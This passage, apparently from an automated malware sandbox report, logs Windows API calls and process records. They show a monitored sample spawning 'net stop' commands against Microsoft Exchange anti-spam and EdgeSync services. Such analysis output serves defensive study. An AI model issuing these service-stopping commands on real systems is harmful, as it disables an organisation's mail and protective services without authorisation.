= 0x7e7b0000 end_va = 0x7e8affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e7b0000" filename = "" Region: id = 9786 start_va = 0x7e8d7000 end_va = 0x7e8d9fff entry_point = 0x0 region_type = private name = "private_0x000000007e8d7000" filename = "" Region: id = 9787 start_va = 0x60000 end_va = 0x63fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 9788 start_va = 0x1c0000 end_va = 0x1c2fff entry_point = 0x1c0000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 9789 start_va = 0x490000 end_va = 0x4c1fff entry_point = 0x490000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 602 os_tid = 0x9c8 [0135.393] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0135.394] __set_app_type (_Type=0x1) [0135.394] __p__fmode () returned 0x77ac4d6c [0135.394] __p__commode () returned 0x77ac5b1c [0135.394] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0135.394] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0135.394] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0135.394] GetConsoleOutputCP () returned 0x1b5 [0135.394] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0135.394] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.396] sprintf_s (in: _DstBuf=0x14fa18, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0135.396] setlocale (category=0, locale=".437") returned="English_United States.437" [0135.398] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0135.398] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0135.398] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeAntispamUpdate" [0135.398] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f7c0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0135.398] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x14f7b4 | out: Buffer=0x14f7b4*=0x1d80f8) returned 0x0 [0135.398] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x14f7b8 | out: Buffer=0x14f7b8*=0x1d8008) returned 0x0 [0135.398] __iob_func () returned 0x77ac1208 [0135.398] _fileno (_File=0x77ac1208) returned 0 [0135.398] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0135.398] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0135.398] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0135.398] _wcsicmp (_String1="config", _String2="stop") returned -16 [0135.398] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0135.398] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0135.398] _wcsicmp (_String1="file", _String2="stop") returned -13 [0135.398] _wcsicmp (_String1="files", _String2="stop") returned -13 [0135.398] _wcsicmp (_String1="group", _String2="stop") returned -12 [0135.398] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0135.398] _wcsicmp (_String1="help", _String2="stop") returned -11 [0135.398] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0135.398] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0135.398] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0135.398] _wcsicmp (_String1="session", _String2="stop") returned -15 [0135.398] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0135.398] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0135.398] _wcsicmp (_String1="share", _String2="stop") returned -12 [0135.398] _wcsicmp (_String1="start", _String2="stop") returned -14 [0135.398] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0135.398] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0135.398] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0135.398] _wcsicmp (_String1="accounts", _String2="MSExchangeAntispamUpdate") returned -12 [0135.398] _wcsicmp (_String1="computer", _String2="MSExchangeAntispamUpdate") returned -10 [0135.398] _wcsicmp (_String1="config", _String2="MSExchangeAntispamUpdate") returned -10 [0135.398] _wcsicmp (_String1="continue", _String2="MSExchangeAntispamUpdate") returned -10 [0135.398] _wcsicmp (_String1="cont", _String2="MSExchangeAntispamUpdate") returned -10 [0135.398] _wcsicmp (_String1="file", _String2="MSExchangeAntispamUpdate") returned -7 [0135.398] _wcsicmp (_String1="files", _String2="MSExchangeAntispamUpdate") returned -7 [0135.398] _wcsicmp (_String1="group", _String2="MSExchangeAntispamUpdate") returned -6 [0135.398] _wcsicmp (_String1="groups", _String2="MSExchangeAntispamUpdate") returned -6 [0135.398] _wcsicmp (_String1="help", _String2="MSExchangeAntispamUpdate") returned -5 [0135.398] _wcsicmp (_String1="helpmsg", _String2="MSExchangeAntispamUpdate") returned -5 [0135.398] _wcsicmp (_String1="localgroup", _String2="MSExchangeAntispamUpdate") returned -1 [0135.398] _wcsicmp (_String1="pause", _String2="MSExchangeAntispamUpdate") returned 3 [0135.399] _wcsicmp (_String1="session", _String2="MSExchangeAntispamUpdate") returned 6 [0135.399] _wcsicmp (_String1="sessions", _String2="MSExchangeAntispamUpdate") returned 6 [0135.399] _wcsicmp (_String1="sess", _String2="MSExchangeAntispamUpdate") returned 6 [0135.399] _wcsicmp (_String1="share", _String2="MSExchangeAntispamUpdate") returned 6 [0135.399] _wcsicmp (_String1="start", _String2="MSExchangeAntispamUpdate") returned 6 [0135.399] _wcsicmp (_String1="stats", _String2="MSExchangeAntispamUpdate") returned 6 [0135.399] _wcsicmp (_String1="statistics", _String2="MSExchangeAntispamUpdate") returned 6 [0135.399] _wcsicmp (_String1="stop", _String2="MSExchangeAntispamUpdate") returned 6 [0135.399] _wcsicmp (_String1="time", _String2="MSExchangeAntispamUpdate") returned 7 [0135.399] _wcsicmp (_String1="user", _String2="MSExchangeAntispamUpdate") returned 8 [0135.399] _wcsicmp (_String1="users", _String2="MSExchangeAntispamUpdate") returned 8 [0135.399] _wcsicmp (_String1="msg", _String2="MSExchangeAntispamUpdate") returned 2 [0135.399] _wcsicmp (_String1="messenger", _String2="MSExchangeAntispamUpdate") returned -14 [0135.399] _wcsicmp (_String1="receiver", _String2="MSExchangeAntispamUpdate") returned 5 [0135.399] _wcsicmp (_String1="rcv", _String2="MSExchangeAntispamUpdate") returned 5 [0135.399] _wcsicmp (_String1="netpopup", _String2="MSExchangeAntispamUpdate") returned 1 [0135.399] _wcsicmp (_String1="redirector", _String2="MSExchangeAntispamUpdate") returned 5 [0135.399] _wcsicmp (_String1="redir", _String2="MSExchangeAntispamUpdate") returned 5 [0135.399] _wcsicmp (_String1="rdr", _String2="MSExchangeAntispamUpdate") returned 5 [0135.399] _wcsicmp (_String1=0x1081ffc, _String2="MSExchangeAntispamUpdate") returned 10 [0135.399] _wcsicmp (_String1="work", _String2="MSExchangeAntispamUpdate") returned 10 [0135.399] _wcsicmp (_String1="wksta", _String2="MSExchangeAntispamUpdate") returned 10 [0135.399] _wcsicmp (_String1="prdr", _String2="MSExchangeAntispamUpdate") returned 3 [0135.399] _wcsicmp (_String1="devrdr", _String2="MSExchangeAntispamUpdate") returned -9 [0135.399] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeAntispamUpdate") returned -1 [0135.399] _wcsicmp (_String1="server", _String2="MSExchangeAntispamUpdate") returned 6 [0135.399] _wcsicmp (_String1="svr", _String2="MSExchangeAntispamUpdate") returned 6 [0135.399] _wcsicmp (_String1="srv", _String2="MSExchangeAntispamUpdate") returned 6 [0135.399] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeAntispamUpdate") returned -1 [0135.399] _wcsicmp (_String1="alerter", _String2="MSExchangeAntispamUpdate") returned -12 [0135.399] _wcsicmp (_String1="netlogon", _String2="MSExchangeAntispamUpdate") returned 1 [0135.399] _wcsupr (in: _String="MSExchangeAntispamUpdate" | out: _String="MSEXCHANGEANTISPAMUPDATE") returned="MSEXCHANGEANTISPAMUPDATE" [0135.399] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x1d3758 [0135.401] GetServiceKeyNameW (in: hSCManager=0x1d3758, lpDisplayName="MSEXCHANGEANTISPAMUPDATE", lpServiceName=0x10a8cb0, lpcchBuffer=0x14f72c | out: lpServiceName="", lpcchBuffer=0x14f72c) returned 0 [0135.401] _wcsicmp (_String1="msg", _String2="MSEXCHANGEANTISPAMUPDATE") returned 2 [0135.401] _wcsicmp (_String1="messenger", _String2="MSEXCHANGEANTISPAMUPDATE") returned -14 [0135.401] _wcsicmp (_String1="receiver", _String2="MSEXCHANGEANTISPAMUPDATE") returned 5 [0135.402] _wcsicmp (_String1="rcv", _String2="MSEXCHANGEANTISPAMUPDATE") returned 5 [0135.402] _wcsicmp (_String1="redirector", _String2="MSEXCHANGEANTISPAMUPDATE") returned 5 [0135.402] _wcsicmp (_String1="redir", _String2="MSEXCHANGEANTISPAMUPDATE") returned 5 [0135.402] _wcsicmp (_String1="rdr", _String2="MSEXCHANGEANTISPAMUPDATE") returned 5 [0135.402] _wcsicmp (_String1="workstation", _String2="MSEXCHANGEANTISPAMUPDATE") returned 10 [0135.402] _wcsicmp (_String1="work", _String2="MSEXCHANGEANTISPAMUPDATE") returned 10 [0135.402] _wcsicmp (_String1="wksta", _String2="MSEXCHANGEANTISPAMUPDATE") returned 10 [0135.402] _wcsicmp (_String1="prdr", _String2="MSEXCHANGEANTISPAMUPDATE") returned 3 [0135.402] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGEANTISPAMUPDATE") returned -9 [0135.402] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGEANTISPAMUPDATE") returned -1 [0135.402] _wcsicmp (_String1="server", _String2="MSEXCHANGEANTISPAMUPDATE") returned 6 [0135.402] _wcsicmp (_String1="svr", _String2="MSEXCHANGEANTISPAMUPDATE") returned 6 [0135.402] _wcsicmp (_String1="srv", _String2="MSEXCHANGEANTISPAMUPDATE") returned 6 [0135.402] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGEANTISPAMUPDATE") returned -1 [0135.402] _wcsicmp (_String1="alerter", _String2="MSEXCHANGEANTISPAMUPDATE") returned -12 [0135.402] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGEANTISPAMUPDATE") returned 1 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="WORKSTATION") returned -10 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="LanmanWorkstation") returned 1 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="SERVER") returned -6 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="LanmanServer") returned 1 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="BROWSER") returned 11 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="BROWSER") returned 11 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="MESSENGER") returned 14 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="MESSENGER") returned 14 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="NETRUN") returned -1 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="NETRUN") returned -1 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="SPOOLER") returned -6 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="SPOOLER") returned -6 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="ALERTER") returned 12 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="ALERTER") returned 12 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="NETLOGON") returned -1 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="NETLOGON") returned -1 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="NETPOPUP") returned -1 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="NETPOPUP") returned -1 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="SQLSERVER") returned -6 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="SQLSERVER") returned -6 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="REPLICATOR") returned -5 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="REPLICATOR") returned -5 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="REMOTEBOOT") returned -5 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="REMOTEBOOT") returned -5 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="TIMESOURCE") returned -7 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="TIMESOURCE") returned -7 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="AFP") returned 12 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="AFP") returned 12 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="UPS") returned -8 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="UPS") returned -8 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="XACTSRV") returned -11 [0135.402] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="XACTSRV") returned -11 [0135.403] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="TCPIP") returned -7 [0135.403] _wcsicmp (_String1="MSEXCHANGEANTISPAMUPDATE", _String2="TCPIP") returned -7 [0135.403] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x1d25f0 [0135.403] OpenServiceW (hSCManager=0x1d25f0, lpServiceName="MSEXCHANGEANTISPAMUPDATE", dwDesiredAccess=0x84) returned 0x0 [0135.403] GetLastError () returned 0x424 [0135.403] CloseServiceHandle (hSCObject=0x1d25f0) returned 1 [0135.403] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0135.403] LoadLibraryW (lpLibFileName="NETMSG") returned 0x1c0000 [0135.404] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x1c0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0135.405] GetFileType (hFile=0x40) returned 0x2 [0135.405] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x14f5c8 | out: lpMode=0x14f5c8) returned 1 [0135.405] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x14f5d4, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x14f5d4*=0x1e) returned 1 [0135.405] GetFileType (hFile=0x40) returned 0x2 [0135.405] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x14f5c8 | out: lpMode=0x14f5c8) returned 1 [0135.406] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f5d4, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x14f5d4*=0x2) returned 1 [0135.406] _ultow (in: _Dest=0x889, _Radix=1373672 | out: _Dest=0x889) returned="2185" [0135.406] FormatMessageW (in: dwFlags=0x2800, lpSource=0x1c0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0135.406] GetFileType (hFile=0x40) returned 0x2 [0135.406] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x14f5b8 | out: lpMode=0x14f5b8) returned 1 [0135.406] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x14f5c4, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x14f5c4*=0x34) returned 1 [0135.406] GetFileType (hFile=0x40) returned 0x2 [0135.406] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x14f5b8 | out: lpMode=0x14f5b8) returned 1 [0135.406] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f5c4, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x14f5c4*=0x2) returned 1 [0135.407] NetApiBufferFree (Buffer=0x1d80f8) returned 0x0 [0135.407] NetApiBufferFree (Buffer=0x1d8008) returned 0x0 [0135.407] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeAntispamUpdate" [0135.407] exit (_Code=2) Thread: id = 603 os_tid = 0x908 Process: id = "193" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x29470000" os_pid = "0x420" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop MSExchangeEdgeSync" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9790 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 9791 start_va = 0x760000 end_va = 0x475ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 9792 start_va = 0x4760000 end_va = 0x477ffff entry_point = 0x0 region_type = private name = "private_0x0000000004760000" filename = "" Region: id = 9793 start_va = 0x4780000 end_va = 0x4780fff entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 9794 start_va = 0x4790000 end_va = 0x47a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004790000" filename = "" Region: id = 9795 start_va = 0x47b0000 end_va = 0x47effff entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 9796 start_va = 0x47f0000 end_va = 0x48effff entry_point = 0x0 region_type = private name = "private_0x00000000047f0000" filename = "" Region: id = 9797 start_va = 0x48f0000 end_va = 0x48f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048f0000" filename = "" Region: id = 9798 start_va = 0x4900000 end_va = 0x4900fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004900000" filename = "" Region: id = 9799 start_va = 0x4910000 end_va = 0x4911fff entry_point = 0x0 region_type = private name = "private_0x0000000004910000" filename = "" Region: id = 9800 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9801 start_va = 0x7e8d0000 end_va = 0x7e8f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e8d0000" filename = "" Region: id = 9802 start_va = 0x7e8fa000 end_va = 0x7e8fafff entry_point = 0x0 region_type = private name = "private_0x000000007e8fa000" filename = "" Region: id = 9803 start_va = 0x7e8fc000 end_va = 0x7e8fefff entry_point = 0x0 region_type = private name = "private_0x000000007e8fc000" filename = "" Region: id = 9804 start_va = 0x7e8ff000 end_va = 0x7e8fffff entry_point = 0x0 region_type = private name = "private_0x000000007e8ff000" filename = "" Region: id = 9805 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9806 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9807 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 9808 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9809 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 9810 start_va = 0x4a80000 end_va = 0x4a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a80000" filename = "" Region: id = 9811 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9812 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9813 start_va = 0x4c50000 end_va = 0x4d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c50000" filename = "" Region: id = 9814 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9855 start_va = 0x4760000 end_va = 0x476ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004760000" filename = "" Region: id = 9856 start_va = 0x4920000 end_va = 0x49ddfff entry_point = 0x4920000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9857 start_va = 0x49e0000 end_va = 0x4a1ffff entry_point = 0x0 region_type = private name = "private_0x00000000049e0000" filename = "" Region: id = 9858 start_va = 0x4a90000 end_va = 0x4b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a90000" filename = "" Region: id = 9859 start_va = 0x4c40000 end_va = 0x4c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c40000" filename = "" Region: id = 9860 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9861 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9862 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9863 start_va = 0x7e7d0000 end_va = 0x7e8cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e7d0000" filename = "" Region: id = 9864 start_va = 0x7e8f7000 end_va = 0x7e8f9fff entry_point = 0x0 region_type = private name = "private_0x000000007e8f7000" filename = "" Region: id = 9865 start_va = 0x4770000 end_va = 0x4773fff entry_point = 0x0 region_type = private name = "private_0x0000000004770000" filename = "" Region: id = 9866 start_va = 0x4780000 end_va = 0x4783fff entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 9867 start_va = 0x4d50000 end_va = 0x5086fff entry_point = 0x4d50000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 604 os_tid = 0x544 [0135.560] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0135.560] __set_app_type (_Type=0x1) [0135.560] __p__fmode () returned 0x77ac4d6c [0135.560] __p__commode () returned 0x77ac5b1c [0135.561] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0135.561] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0135.561] GetCurrentThreadId () returned 0x544 [0135.561] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x544) returned 0x84 [0135.561] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0135.561] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0135.561] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.563] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0135.563] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x48efe30 | out: phkResult=0x48efe30*=0x0) returned 0x2 [0135.564] VirtualQuery (in: lpAddress=0x48efe37, lpBuffer=0x48efde8, dwLength=0x1c | out: lpBuffer=0x48efde8*(BaseAddress=0x48ef000, AllocationBase=0x47f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0135.564] VirtualQuery (in: lpAddress=0x47f0000, lpBuffer=0x48efde8, dwLength=0x1c | out: lpBuffer=0x48efde8*(BaseAddress=0x47f0000, AllocationBase=0x47f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0135.564] VirtualQuery (in: lpAddress=0x47f1000, lpBuffer=0x48efde8, dwLength=0x1c | out: lpBuffer=0x48efde8*(BaseAddress=0x47f1000, AllocationBase=0x47f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0135.564] VirtualQuery (in: lpAddress=0x47f3000, lpBuffer=0x48efde8, dwLength=0x1c | out: lpBuffer=0x48efde8*(BaseAddress=0x47f3000, AllocationBase=0x47f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0135.564] VirtualQuery (in: lpAddress=0x48f0000, lpBuffer=0x48efde8, dwLength=0x1c | out: lpBuffer=0x48efde8*(BaseAddress=0x48f0000, AllocationBase=0x48f0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0135.564] GetConsoleOutputCP () returned 0x1b5 [0135.564] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0135.564] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0135.564] _get_osfhandle (_FileHandle=1) returned 0x3c [0135.564] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0135.564] _get_osfhandle (_FileHandle=1) returned 0x3c [0135.564] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0135.565] _get_osfhandle (_FileHandle=1) returned 0x3c [0135.565] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0135.565] _get_osfhandle (_FileHandle=0) returned 0x38 [0135.565] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0135.565] _get_osfhandle (_FileHandle=0) returned 0x38 [0135.565] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0135.565] GetEnvironmentStringsW () returned 0x4c57d70* [0135.565] FreeEnvironmentStringsA (penv="A") returned 1 [0135.565] GetEnvironmentStringsW () returned 0x4c57d70* [0135.565] FreeEnvironmentStringsA (penv="A") returned 1 [0135.565] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", 